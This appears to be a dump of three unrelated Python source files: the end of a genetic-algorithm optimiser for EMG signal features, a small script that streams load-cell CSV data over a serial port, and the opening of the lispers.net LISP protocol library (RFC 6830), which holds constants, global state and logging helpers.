for i in range(0,tamPop):
self.population.append(ind())
def evaluateAll(self):
for ind in self.population:
ind.fit=fitness(ind)
def getBest(self):
return self.population[np.argmax(self.population)]
# Mutation method. The mutation can be vetorial or absolute.
def mutate(indiv):
global taxaMut,chanceMut
if random.random()<vectorialMutationChance:
vec=ind().cromo.freqFactor
amp=np.sqrt(np.sum(pow(i,2) for i in vec.A1))
vec/=amp
vec*=taxaMut*random.random()
indiv.cromo.freqFactor+=vec
indiv.marker='vectorial'
# for line in indiv.cromo.freqFactor:
# for i in range(0,len(np.array(line)[0])):
# if random.random()*1000<chanceMut:
# line[0,i]+=mut*random.random()
else:
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
if random.random()*10000<chanceMut:
if random.random()<0.5:
mut = taxaMut
else:
mut = -taxaMut
line[0,i]+=mut*random.random()
indiv.marker='absolute'
# Crossover by adding different chromossomes and dividing by the number of
# fathers
def meanCrossover(pais):
filho= ind()
somaFreqs = sum([pai.cromo.freqFactor for pai in pais])
tam= len(pais)
filho.cromo.freqFactor=somaFreqs/tam
mutate(filho)
filho.marker+=' meaned '
return filho
# Crossover by replacing the sons genes by his mother's or his father's, with
# 50% chance
def binaryCrossover(pais):
filho=ind()
for i in range(0,len(filho.cromo.freqFactor)):
for j in range(0,len(filho.cromo.freqFactor[0].A1)):
if random.random()<0.5:
filho.cromo.freqFactor[i,j]=pais[0].cromo.freqFactor[i,j]
else:
filho.cromo.freqFactor[i,j]=pais[1].cromo.freqFactor[i,j]
mutate(filho)
filho.marker+=' binerized '
return filho
# Mixed crossover
def weightedCrossover(pais):
if random.random()<binaryCrossChance:
return binaryCrossover(pais)
else:
return meanCrossover(pais)
# Tournament. Returns the best fitted individual
def torneio(pop):
bestIndiv=pop.population[0]
for indiv in pop.population:
if indiv.fit>=bestIndiv.fit:
bestIndiv=indiv
return bestIndiv
# Generate a new population by performing crossovers with best and the reminder
# population
def genNewPop(best,pop):
newpop=population()
for indiv in pop.population:
if indiv == best:
newpop.population.append(indiv)
continue
else:
temp=weightedCrossover([best,indiv])
newpop.population.append(temp)
return newpop
# Remove the n less fitted individuals, replacing them by new ones
def removeSuckers(pop,n):
def getFit(indiv):
return indiv.fit
pop.population.sort(reverse=False,key=getFit)
for i in range(0,n):
pop.population[i]=ind()
# Returns the mean fitness of poppulation in pop
def getPopMean(pop):
temp=0.0
tam=len(pop.population)
for indiv in pop.population:
temp+=indiv.fit
return temp/tam
# Not used. Divide all chromossomes of a population by the highest number
# amongst them
def normalizePop(pop):
for indiv in pop.population:
maxF=0
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
if abs(line[0,i]) > maxF:
maxF=abs(line[0,i])
for line in indiv.cromo.freqFactor:
for i in range(0,len(np.array(line)[0])):
line[0,i]/=maxF
# Plot a graph
def plotGens(best,mean):
plt.plot(best,'go')
plt.plot(mean,'b-')
# Class for controlling the GA variables
class populationControl():
global tamPop,\
taxaMut,\
chanceMut,\
bestAll,\
bias,\
maxGen,\
tamPop,\
taxaMut,\
taxaMutMax,\
chanceMut,\
continuous,\
binaryFit,\
multFac,\
binaryCrossChance,\
taxaMutMult,\
taxaMutMin
def __init__(self):
self._tamPop=tamPop
self._taxaMut=taxaMut
self._chanceMut=chanceMut
self._bias=bias
self._maxGen=maxGen
self._tamPop=tamPop
self._taxaMutMin=taxaMutMin
self._taxaMutMax=taxaMutMax
self._chanceMut=chanceMut
self._continuous=continuous
self._binaryFit=binaryFit
self._multFac=multFac
self._binaryCrossChance=binaryCrossChance
self._taxaMutMult=taxaMutMult
self._counter=0
self._expansion=False
def control(self,gen,counter,best,last):
global taxaMut
# taxaMut=self._taxaMutMax
ascendingCounter=0
if gen>25:
if best.fit<=last.fit*1.001: #If the fitness doesnt grow by 0.1%
self._counter+=1
else:
# taxaMut=self._taxaMut
chanceMut=self._chanceMut
self._expansion=False
self._counter=0
ascendingCounter=0
if self._counter==8: # If the fitness doesnt grow in n generations
if self._expansion: # If it the taxaMut is increasing
if taxaMut<self._taxaMutMax: # If taxaMut is less than the maximum
taxaMut*=self._taxaMutMult
else: # If taxaMut bigger than the maximum
self._expansion=False
else: # If taxaMut is decreasing
if taxaMut>self._taxaMutMin: # If it is bigger than the minimum
taxaMut/=self._taxaMutMult
else: # If it is less than the minimum
self._expansion=True
self._counter=0
def main():
global maxFreq,\
freqStep,\
tamPop,\
taxaMut,\
chanceMut,\
nArq,\
bestAll,\
startOver,\
bestTypes
gen=0
counter=0
last=ind()
bestVec=[]
meanVec=[]
taxaVec=[]
taxaMut=taxaMutMax
# plotter=dataPlotter.dataPlotter('Geracao','Melhor de Todos',bestVec)
# threading.Thread(target=plotter.start).start()
controller=populationControl()
readArqs(sourceType)
if sourceType=='bioplux':
nArq=len(getArqs())
elif sourceType=='ninapro':
nArq=len(real)
if startOver:
pop = population()
pop.initPop(tamPop)
else:
pop=bestAll
while gen<maxGen:
gen+=1
pop.evaluateAll()
best=torneio(pop)
if not last.uid==best.uid:
bestTypes.append(best.marker)
print(gen,best.fit,':',best.marker,tamPop,taxaMut,chanceMut,maxGen)#,':', [p.fit for p in population]
pop=genNewPop(best,pop)
###########################################################################
controller.control(gen,counter,best,last)
last=best
taxaVec.append(20*np.log(taxaMut))
bestVec.append(last.fit)
meanVec.append(getPopMean(pop))
###########################################################################
# createSuckers(pop.tamPop/3)
removeSuckers(pop,tamPop/5)
# normalizePop(pop)
plotGens(bestVec,meanVec)
plotGens(bestVec,taxaVec)
pop.evaluateAll()
print([p.fit for p in pop.population])
return pop
bestAll=main()
|
celda.py
|
import serial
import argparse
import time
import csv
from threading import Thread
def main():
with open('celda.csv') as out:
ser = serial.Serial(port)
csv_reader = csv.reader(out)
for row in csv_reader:
time.sleep(0.4)
ser.write((row[0] + "\n").encode())
parser = argparse.ArgumentParser(description="Simula stream de datos de celda de carga por puerto serial")
parser.add_argument('--port', action='store', help='Puerto al cual va a streamear', required=True, dest='port')
port = parser.parse_args().port
print(type(port))
t1 = Thread(target=main, daemon=True)
t1.start()
while True:
time.sleep(0.1)
t1.join()
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by user we don't do rate-limiting for
# 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
lisp_ms_json_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
# Dictiionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictoinary array indexed by group address string. The value of the nested
# dictionay array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds, 1 minute
LISP_TEST_MR_INTERVAL = 60 # In units of seconds, 1 minute
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = .5 # In units of seconds, 500 ms
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60 # In units of seconds, 1 minute
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # In units of seconds, 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Apline Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-vendor")
if (vm.find("command not found") != -1 and lisp_on_docker()):
aws = bold("AWS check", False)
lprint("{} - dmidecode not installed in docker container".format(aws))
#endif
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
return(os.path.exists("/.dockerenv"))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
